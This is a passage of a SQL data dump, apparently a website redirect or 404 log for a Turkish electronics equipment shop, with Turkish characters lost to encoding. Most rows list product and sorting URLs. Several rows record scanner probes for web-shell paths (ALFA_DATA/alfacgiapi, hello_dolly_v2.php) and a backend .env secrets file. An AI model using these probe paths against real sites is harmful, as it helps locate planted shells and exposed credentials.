00:00:00',301),(41868,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-h??/by,product_name?language=tr-tr',NULL,'','',2,0,'2025-06-28 22:52:09','0000-00-00 00:00:00',301),(41869,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-h??/by,product_sku',NULL,'','',2,0,'2025-06-28 22:52:14','0000-00-00 00:00:00',301),(41870,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-h???language=tr-tr',NULL,'','',2,0,'2025-06-28 22:52:28','0000-00-00 00:00:00',301),(41871,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-h?z',NULL,'','',2,0,'2025-06-28 22:52:31','0000-00-00 00:00:00',301),(41872,'http://3s-technologies.com.tr/tr/css/alfa_data/alfacgiapi',NULL,'http://3s-technologies.com.tr/css/ALFA_DATA/alfacgiapi/','',2,0,'2025-06-28 23:14:50','0000-00-00 00:00:00',301),(41873,'http://3s-technologies.com.tr/tr/components/alfa_data/alfacgiapi',NULL,'http://3s-technologies.com.tr/components/ALFA_DATA/alfacgiapi/','',2,0,'2025-06-28 23:32:12','0000-00-00 00:00:00',301),(41874,'http://3s-technologies.com.tr/tr/upload/alfa_data/alfacgiapi',NULL,'http://3s-technologies.com.tr/upload/ALFA_DATA/alfacgiapi/','',2,0,'2025-06-28 23:32:50','0000-00-00 00:00:00',301),(41875,'http://3s-technologies.com.tr/tr/uploads/alfa_data/alfacgiapi',NULL,'http://3s-technologies.com.tr/uploads/ALFA_DATA/alfacgiapi/','',2,0,'2025-06-28 23:34:34','0000-00-00 00:00:00',301),(41876,'http://3s-technologies.com.tr/tr/backend/.env',NULL,'http://3s-technologies.com.tr/backend/.env','',10,0,'2025-06-28 23:52:47','0000-00-00 00:00:00',301),(41877,'https://3s-technologies.com.tr/en/wp-content/themes/hello_dolly_v2.php',NULL,'','',4,0,'2025-06-29 00:24:23','0000-00-00 00:00:00',301),(41878,'https://3s-technologies.com.tr/en/wp-content/plugins/hellodollyv2/hello_dolly_v2.php',NULL,'','',4,0,'2025-06-29 00:24:38','0000-00-00 00:00:00',301),(41879,'http://3s-technologies.com.tr/en/products/smd-ultra-h?language=en-gb',NULL,'','',2,0,'2025-06-29 01:08:48','0000-00-00 00:00:00',301),(41880,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-h?z/by,`p`.product_sku',NULL,'','',2,0,'2025-06-29 01:09:20','0000-00-00 00:00:00',301),(41881,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-h?z/by,`p`.product_sku/dirdesc',NULL,'','',2,0,'2025-06-29 01:09:25','0000-00-00 00:00:00',301),(41882,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-h?z/by,product_name',NULL,'','',2,0,'2025-06-29 01:10:27','0000-00-00 00:00:00',301),(41883,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-h?z/by,product_name/dirdesc',NULL,'','',2,0,'2025-06-29 01:10:32','0000-00-00 00:00:00',301),(41884,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-h?z/by,product_sku',NULL,'','',2,0,'2025-06-29 01:10:44','0000-00-00 00:00:00',301),(41885,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-h?z/dirdesc',NULL,'','',2,0,'2025-06-29 01:10:53','0000-00-00 00:00:00',301),(41886,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-f??n',NULL,'','',3,0,'2025-06-29 01:11:05','0000-00-00 00:00:00',301),(41887,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-f??n/by,`p`.product_sku',NULL,'','',3,0,'2025-06-29 01:11:08','0000-00-00 00:00:00',301),(41888,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-f??n/by,`p`.product_sku/dirdesc',NULL,'','',3,0,'2025-06-29 01:12:53','0000-00-00 00:00:00',301),(41889,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-f??n/by,`p`.product_sku?language=tr-tr',NULL,'','',3,0,'2025-06-29 01:12:56','0000-00-00 00:00:00',301),(41890,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-f??n/by,category_name',NULL,'','',3,0,'2025-06-29 01:12:59','0000-00-00 00:00:00',301),(41891,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-f??n/by,category_name/dirdesc',NULL,'','',3,0,'2025-06-29 01:13:03','0000-00-00 00:00:00',301),(41892,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-f??n/by,category_name/dirdesc?language=tr-tr',NULL,'','',3,0,'2025-06-29 01:13:06','0000-00-00 00:00:00',301),(41893,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-f??n/by,category_name?language=tr-tr',NULL,'','',3,0,'2025-06-29 01:13:09','0000-00-00 00:00:00',301),(41894,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-f??n/by,mf_name',NULL,'','',3,0,'2025-06-29 01:13:12','0000-00-00 00:00:00',301),(41895,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-f??n/by,mf_name/dirdesc',NULL,'','',3,0,'2025-06-29 01:13:15','0000-00-00 00:00:00',301),(41896,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-f??n/by,mf_name/dirdesc?language=tr-tr',NULL,'','',3,0,'2025-06-29 01:13:19','0000-00-00 00:00:00',301),(41897,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-f??n/by,mf_name?language=tr-tr',NULL,'','',3,0,'2025-06-29 01:13:22','0000-00-00 00:00:00',301),(41898,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-f??n/by,ordering',NULL,'','',3,0,'2025-06-29 01:13:26','0000-00-00 00:00:00',301),(41899,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-f??n/by,ordering?language=tr-tr',NULL,'','',3,0,'2025-06-29 01:13:29','0000-00-00 00:00:00',301),(41900,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-f??n/by,product_name',NULL,'','',3,0,'2025-06-29 01:13:32','0000-00-00 00:00:00',301),(41901,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-f??n/by,product_name/dirdesc',NULL,'','',3,0,'2025-06-29 01:13:36','0000-00-00 00:00:00',301),(41902,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-f??n/by,product_name/dirdesc?language=tr-tr',NULL,'','',3,0,'2025-06-29 01:13:39','0000-00-00 00:00:00',301),(41903,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-f??n/by,product_name?language=tr-tr',NULL,'','',3,0,'2025-06-29 01:13:42','0000-00-00 00:00:00',301),(41904,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-f??n/by,product_sku',NULL,'','',3,0,'2025-06-29 01:13:45','0000-00-00 00:00:00',301),(41905,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-f??n/dirdesc',NULL,'','',3,0,'2025-06-29 01:13:49','0000-00-00 00:00:00',301),(41906,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-f??n/dirdesc?language=tr-tr',NULL,'','',3,0,'2025-06-29 01:13:52','0000-00-00 00:00:00',301),(41907,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-f??n?language=tr-tr',NULL,'','',3,0,'2025-06-29 01:13:55','0000-00-00 00:00:00',301),(41908,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-d????k-h??zl??',NULL,'','',3,0,'2025-06-29 01:13:58','0000-00-00 00:00:00',301),(41909,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-d????k-h??zl??/by,`p`.product_sku',NULL,'','',3,0,'2025-06-29 01:14:02','0000-00-00 00:00:00',301),(41910,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-d????k-h??zl??/by,`p`.product_sku/dirdesc',NULL,'','',3,0,'2025-06-29 01:14:05','0000-00-00 00:00:00',301),(41911,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-d????k-h??zl??/by,`p`.product_sku/dirdesc?language=tr-tr',NULL,'','',3,0,'2025-06-29 01:14:08','0000-00-00 00:00:00',301),(41912,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-d????k-h??zl??/by,`p`.product_sku?language=tr-tr',NULL,'','',3,0,'2025-06-29 01:14:12','0000-00-00 00:00:00',301),(41913,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-d????k-h??zl??/by,category_name',NULL,'','',3,0,'2025-06-29 01:14:15','0000-00-00 00:00:00',301),(41914,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-d????k-h??zl??/by,category_name/dirdesc',NULL,'','',3,0,'2025-06-29 01:14:18','0000-00-00 00:00:00',301),(41915,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-d????k-h??zl??/by,category_name/dirdesc?language=tr-tr',NULL,'','',3,0,'2025-06-29 01:14:22','0000-00-00 00:00:00',301),(41916,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-d????k-h??zl??/by,category_name?language=tr-tr',NULL,'','',3,0,'2025-06-29 01:14:25','0000-00-00 00:00:00',301),(41917,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-d????k-h??zl??/by,mf_name',NULL,'','',3,0,'2025-06-29 01:14:28','0000-00-00 00:00:00',301),(41918,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-d????k-h??zl??/by,mf_name/dirdesc',NULL,'','',3,0,'2025-06-29 01:14:31','0000-00-00 00:00:00',301),(41919,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-d????k-h??zl??/by,mf_name/dirdesc?language=tr-tr',NULL,'','',3,0,'2025-06-29 01:14:35','0000-00-00 00:00:00',301),(41920,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-d????k-h??zl??/by,mf_name?language=tr-tr',NULL,'','',3,0,'2025-06-29 01:14:38','0000-00-00 00:00:00',301),(41921,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-d????k-h??zl??/by,ordering',NULL,'','',3,0,'2025-06-29 01:14:41','0000-00-00 00:00:00',301),(41922,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-d????k-h??zl??/by,ordering?language=tr-tr',NULL,'','',3,0,'2025-06-29 01:14:44','0000-00-00 00:00:00',301),(41923,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-d????k-h??zl??/by,product_name',NULL,'','',3,0,'2025-06-29 01:14:47','0000-00-00 00:00:00',301),(41924,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-d????k-h??zl??/by,product_name/dirdesc',NULL,'','',3,0,'2025-06-29 01:14:51','0000-00-00 00:00:00',301),(41925,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-d????k-h??zl??/by,product_name/dirdesc?language=tr-tr',NULL,'','',3,0,'2025-06-29 01:14:54','0000-00-00 00:00:00',301),(41926,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-d???k-h??zl??/by,product_name?language=tr-tr',NULL,'','',1,0,'2025-06-29 02:25:10','0000-00-00 00:00:00',301),(41927,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-d????k-h??zl??/cs40-detail',NULL,'','',1,0,'2025-06-29 02:25:17','0000-00-00 00:00:00',301),(41928,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-d????k-h??zl??/cs40-detail/askquestion?tmpl=component',NULL,'','',3,0,'2025-06-29 02:25:24','0000-00-00 00:00:00',301),(41929,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-d????k-h??zl??/dirdesc',NULL,'','',3,0,'2025-06-29 02:25:32','0000-00-00 00:00:00',301),(41930,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-d????k-h??zl??/dirdesc?language=tr-tr',NULL,'','',2,0,'2025-06-29 02:25:39','0000-00-00 00:00:00',301),(41931,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-d????k-h??zl??/le-40v-detail',NULL,'','',2,0,'2025-06-29 02:25:45','0000-00-00 00:00:00',301),(41932,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-d????k-h??zl??/le-40v-detail/askquestion?tmpl=component',NULL,'','',3,0,'2025-06-29 02:25:52','0000-00-00 00:00:00',301),(41933,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-d????k-h??zl??/ls60v-detail',NULL,'','',3,0,'2025-06-29 02:25:57','0000-00-00 00:00:00',301),(41934,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-d????k-h??zl??/ls60v-detail/askquestion?tmpl=component',NULL,'','',3,0,'2025-06-29 02:26:03','0000-00-00 00:00:00',301),(41935,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-d????k-h??zl???language=tr-tr',NULL,'','',3,0,'2025-06-29 02:26:08','0000-00-00 00:00:00',301),(41936,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-f??n',NULL,'','',3,0,'2025-06-29 02:26:13','0000-00-00 00:00:00',301),(41937,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-f??n/by,`p`.product_sku',NULL,'','',3,0,'2025-06-29 02:26:19','0000-00-00 00:00:00',301),(41938,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-f??n/by,`p`.product_sku/dirdesc',NULL,'','',3,0,'2025-06-29 02:26:23','0000-00-00 00:00:00',301),(41939,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-f??n/by,`p`.product_sku/dirdesc?language=tr-tr',NULL,'','',3,0,'2025-06-29 02:28:09','0000-00-00 00:00:00',301),(41940,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-f??n/by,`p`.product_sku?language=tr-tr',NULL,'','',3,0,'2025-06-29 02:28:12','0000-00-00 00:00:00',301),(41941,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-f??n/by,category_name',NULL,'','',3,0,'2025-06-29 02:28:15','0000-00-00 00:00:00',301),(41942,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-f??n/by,category_name/dirdesc',NULL,'','',3,0,'2025-06-29 02:28:19','0000-00-00 00:00:00',301),(41943,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-f??n/by,category_name/dirdesc?language=tr-tr',NULL,'','',3,0,'2025-06-29 02:28:22','0000-00-00 00:00:00',301),(41944,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-f??n/by,category_name?language=tr-tr',NULL,'','',2,0,'2025-06-29 02:28:25','0000-00-00 00:00:00',301),(41945,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-f??n/by,mf_name',NULL,'','',3,0,'2025-06-29 02:28:28','0000-00-00 00:00:00',301),(41946,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-f??n/by,mf_name/dirdesc',NULL,'','',3,0,'2025-06-29 02:28:32','0000-00-00 00:00:00',301),(41947,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-f??n/by,mf_name/dirdesc?language=tr-tr',NULL,'','',3,0,'2025-06-29 02:28:35','0000-00-00 00:00:00',301),(41948,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-f??n/by,mf_name?language=tr-tr',NULL,'','',3,0,'2025-06-29 02:28:38','0000-00-00 00:00:00',301),(41949,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-f??n/by,ordering',NULL,'','',3,0,'2025-06-29 02:28:42','0000-00-00 00:00:00',301),(41950,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-f??n/by,ordering?language=tr-tr',NULL,'','',3,0,'2025-06-29 02:28:45','0000-00-00 00:00:00',301),(41951,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-f??n/by,product_name/dirdesc',NULL,'','',3,0,'2025-06-29 02:28:49','0000-00-00 00:00:00',301),(41952,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-f??n/by,product_name/dirdesc?language=tr-tr',NULL,'','',3,0,'2025-06-29 02:28:52','0000-00-00 00:00:00',301),(41953,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-f??n/by,product_name?language=tr-tr',NULL,'','',3,0,'2025-06-29 02:28:56','0000-00-00 00:00:00',301),(41954,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-f??n/by,product_sku',NULL,'','',3,0,'2025-06-29 02:28:59','0000-00-00 00:00:00',301),(41955,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-f??n/by,product_sku?language=tr-tr',NULL,'','',3,0,'2025-06-29 02:29:03','0000-00-00 00:00:00',301),(41956,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-f??n/dirdesc',NULL,'','',3,0,'2025-06-29 02:29:06','0000-00-00 00:00:00',301),(41957,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-f??n/dirdesc?language=tr-tr',NULL,'','',3,0,'2025-06-29 02:29:09','0000-00-00 00:00:00',301),(41958,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-f??n/gf-12-hc-ht-detail',NULL,'','',3,0,'2025-06-29 02:29:12','0000-00-00 00:00:00',301),(41959,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-f??n/gf-12-hc-ht-detail/askquestion?tmpl=component',NULL,'','',3,0,'2025-06-29 02:29:16','0000-00-00 00:00:00',301),(41960,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-f??n/ly-8c-detail',NULL,'','',3,0,'2025-06-29 02:29:19','0000-00-00 00:00:00',301),(41961,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-f??n/ly-8c-detail/askquestion?tmpl=component',NULL,'','',3,0,'2025-06-29 02:29:23','0000-00-00 00:00:00',301),(41962,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-f??n?language=tr-tr',NULL,'','',3,0,'2025-06-29 02:29:26','0000-00-00 00:00:00',301),(41963,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-h??',NULL,'','',3,0,'2025-06-29 02:29:30','0000-00-00 00:00:00',301),(41964,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-h??/am100-detail',NULL,'','',3,0,'2025-06-29 02:29:33','0000-00-00 00:00:00',301),(41965,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-h??/am100-detail/askquestion?tmpl=component',NULL,'','',3,0,'2025-06-29 02:29:37','0000-00-00 00:00:00',301),(41966,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-h??/by,`p`.product_sku',NULL,'','',3,0,'2025-06-29 02:29:40','0000-00-00 00:00:00',301),(41967,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-h??/by,`p`.product_sku/dirdesc',NULL,'','',3,0,'2025-06-29 02:29:43','0000-00-00 00:00:00',301),(41968,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-h??/by,`p`.product_sku/dirdesc?language=tr-tr',NULL,'','',3,0,'2025-06-29 02:29:47','0000-00-00 00:00:00',301),(41969,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-h??/by,`p`.product_sku?language=tr-tr',NULL,'','',3,0,'2025-06-29 02:29:51','0000-00-00 00:00:00',301),(41970,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-h??/by,category_name',NULL,'','',3,0,'2025-06-29 02:29:54','0000-00-00 00:00:00',301),(41971,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-h??/by,category_name/dirdesc',NULL,'','',3,0,'2025-06-29 02:29:57','0000-00-00 00:00:00',301),(41972,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-h??/by,category_name/dirdesc?language=tr-tr',NULL,'','',3,0,'2025-06-29 02:30:01','0000-00-00 00:00:00',301),(41973,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-h??/by,category_name?language=tr-tr',NULL,'','',3,0,'2025-06-29 02:30:04','0000-00-00 00:00:00',301),(41974,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-h??/by,mf_name',NULL,'','',3,0,'2025-06-29 02:30:08','0000-00-00 00:00:00',301),(41975,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-h??/by,mf_name/dirdesc',NULL,'','',3,0,'2025-06-29 02:30:11','0000-00-00 00:00:00',301),(41976,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-h??/by,mf_name/dirdesc?language=tr-tr',NULL,'','',3,0,'2025-06-29 02:30:15','0000-00-00 00:00:00',301),(41977,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-h??/by,mf_name?language=tr-tr',NULL,'','',3,0,'2025-06-29 02:30:18','0000-00-00 00:00:00',301),(41978,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-h??/by,ordering',NULL,'','',3,0,'2025-06-29 02:30:22','0000-00-00 00:00:00',301),(41979,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-h??/by,ordering?language=tr-tr',NULL,'','',3,0,'2025-06-29 02:30:25','0000-00-00 00:00:00',301),(41980,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-h??/by,product_name',NULL,'','',3,0,'2025-06-29 02:30:28','0000-00-00 00:00:00',301),(41981,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-h??/by,product_name/dirdesc',NULL,'','',3,0,'2025-06-29 02:30:32','0000-00-00 00:00:00',301),(41982,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-h??/by,product_name/dirdesc?language=tr-tr',NULL,'','',3,0,'2025-06-29 02:30:35','0000-00-00 00:00:00',301),(41983,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-h??/by,product_name?language=tr-tr',NULL,'','',3,0,'2025-06-29 02:30:39','0000-00-00 00:00:00',301),(41984,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-h??/by,product_sku',NULL,'','',3,0,'2025-06-29 02:30:42','0000-00-00 00:00:00',301),(41985,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-h??/by,product_sku?language=tr-tr',NULL,'','',3,0,'2025-06-29 02:30:45','0000-00-00 00:00:00',301),(41986,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-h??/dirdesc',NULL,'','',3,0,'2025-06-29 02:30:49','0000-00-00 00:00:00',301),(41987,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-h??/dirdesc?language=tr-tr',NULL,'','',3,0,'2025-06-29 02:30:52','0000-00-00 00:00:00',301),(41988,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-h??/mx200lp-detail',NULL,'','',3,0,'2025-06-29 02:30:55','0000-00-00 00:00:00',301),(41989,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-h??/mx200lp-detail/askquestion?tmpl=component',NULL,'','',3,0,'2025-06-29 02:30:59','0000-00-00 00:00:00',301),(41990,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-h???language=tr-tr',NULL,'','',3,0,'2025-06-29 02:31:02','0000-00-00 00:00:00',301),(41991,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-h?z',NULL,'','',3,0,'2025-06-29 02:31:05','0000-00-00 00:00:00',301),(41992,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-h?z/by,`p`.product_sku',NULL,'','',3,0,'2025-06-29 02:31:09','0000-00-00 00:00:00',301),(41993,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-h?z/by,`p`.product_sku/dirdesc',NULL,'','',3,0,'2025-06-29 02:31:12','0000-00-00 00:00:00',301),(41994,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-h?language=tr-tr',NULL,'','',27,0,'2025-06-29 02:31:15','0000-00-00 00:00:00',301),(41995,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-h?z/by,category_name',NULL,'','',3,0,'2025-06-29 02:31:21','0000-00-00 00:00:00',301),(41996,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-h?z/by,category_name/dirdesc',NULL,'','',3,0,'2025-06-29 02:31:25','0000-00-00 00:00:00',301),(41997,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-f?n/by,product_name',NULL,'','',1,0,'2025-06-29 03:32:32','0000-00-00 00:00:00',301),(41998,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-h?z/by,mf_name/dirdesc',NULL,'','',2,0,'2025-06-29 03:32:36','0000-00-00 00:00:00',301),(41999,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-h?z/by,ordering',NULL,'','',2,0,'2025-06-29 03:35:15','0000-00-00 00:00:00',301),(42000,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-h?z/by,product_name',NULL,'','',2,0,'2025-06-29 03:35:22','0000-00-00 00:00:00',301),(42001,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-h?z/by,product_name/dirdesc',NULL,'','',2,0,'2025-06-29 03:35:25','0000-00-00 00:00:00',301),(42002,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-h?z/by,product_sku',NULL,'','',2,0,'2025-06-29 03:35:35','0000-00-00 00:00:00',301),(42003,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-h?z/cm-602-l-detail',NULL,'','',2,0,'2025-06-29 03:35:42','0000-00-00 00:00:00',301),(42004,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-h?tmpl=component',NULL,'','',6,0,'2025-06-29 03:35:45','0000-00-00 00:00:00',301),(42005,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-h?z/dirdesc',NULL,'','',2,0,'2025-06-29 03:35:48','0000-00-00 00:00:00',301),(42006,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-h?z/mx200lp-3-detail',NULL,'','',2,0,'2025-06-29 03:35:55','0000-00-00 00:00:00',301),(42007,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-h?z/npm-detail',NULL,'','',2,0,'2025-06-29 03:36:02','0000-00-00 00:00:00',301),(42008,'https://3s-technologies.com.tr/index.php/tr/ueruenler/?ubuk-lehim',NULL,'','',2,0,'2025-06-29 03:36:11','0000-00-00 00:00:00',301),(42009,'https://3s-technologies.com.tr/index.php/tr/ueruenler/?ubuk-lehim/by,`p`.product_sku',NULL,'','',2,0,'2025-06-29 03:36:14','0000-00-00 00:00:00',301),(42010,'https://3s-technologies.com.tr/index.php/tr/ueruenler/?ubuk-lehim/by,`p`.product_sku/dirdesc',NULL,'','',2,0,'2025-06-29 03:36:18','0000-00-00 00:00:00',301),(42011,'https://3s-technologies.com.tr/index.php/tr/ueruenler/?language=tr-tr',NULL,'','',24,0,'2025-06-29 03:36:21','0000-00-00 00:00:00',301),(42012,'https://3s-technologies.com.tr/index.php/tr/ueruenler/?ubuk-lehim/by,category_name',NULL,'','',2,0,'2025-06-29 03:36:27','0000-00-00 00:00:00',301),(42013,'https://3s-technologies.com.tr/index.php/tr/ueruenler/?ubuk-lehim/by,category_name/dirdesc',NULL,'','',2,0,'2025-06-29 03:36:31','0000-00-00 00:00:00',301),(42014,'https://3s-technologies.com.tr/index.php/tr/ueruenler/?ubuk-lehim/by,mf_name',NULL,'','',2,0,'2025-06-29 03:36:41','0000-00-00 00:00:00',301),(42015,'https://3s-technologies.com.tr/index.php/tr/ueruenler/?ubuk-lehim/by,mf_name/dirdesc',NULL,'','',2,0,'2025-06-29 03:36:44','0000-00-00 00:00:00',301),(42016,'https://3s-technologies.com.tr/index.php/tr/ueruenler/?ubuk-lehim/by,ordering',NULL,'','',2,0,'2025-06-29 03:36:55','0000-00-00 00:00:00',301),(42017,'https://3s-technologies.com.tr/index.php/tr/ueruenler/?ubuk-lehim/by,product_name',NULL,'','',2,0,'2025-06-29 03:37:01','0000-00-00 00:00:00',301),(42018,'https://3s-technologies.com.tr/index.php/tr/ueruenler/?ubuk-lehim/by,product_name/dirdesc',NULL,'','',2,0,'2025-06-29 03:37:05','0000-00-00 00:00:00',301),(42019,'https://3s-technologies.com.tr/index.php/tr/ueruenler/?ubuk-lehim/by,product_sku',NULL,'','',2,0,'2025-06-29 03:37:16','0000-00-00 00:00:00',301),(42020,'https://3s-technologies.com.tr/index.php/tr/ueruenler/?ubuk-lehim/dirdesc',NULL,'','',2,0,'2025-06-29 03:37:22','0000-00-00 00:00:00',301),(42021,'https://3s-technologies.com.tr/index.php/tr/ueruenler/?ubuk-lehim/e-bar-26-detail',NULL,'','',2,0,'2025-06-29 03:37:30','0000-00-00 00:00:00',301),(42022,'https://3s-technologies.com.tr/index.php/tr/ueruenler/?tmpl=component',NULL,'','',4,0,'2025-06-29 03:37:33','0000-00-00 00:00:00',301),(42023,'https://3s-technologies.com.tr/index.php/tr/ueruenler/?ubuk-lehim/e-bar-detail',NULL,'','',2,0,'2025-06-29 03:37:36','0000-00-00 00:00:00',301),(42024,'http://3s-technologies.com.tr/tr/urunler/b?lgesel-lehimleme',NULL,'','',1,0,'2025-06-29 03:37:53','0000-00-00 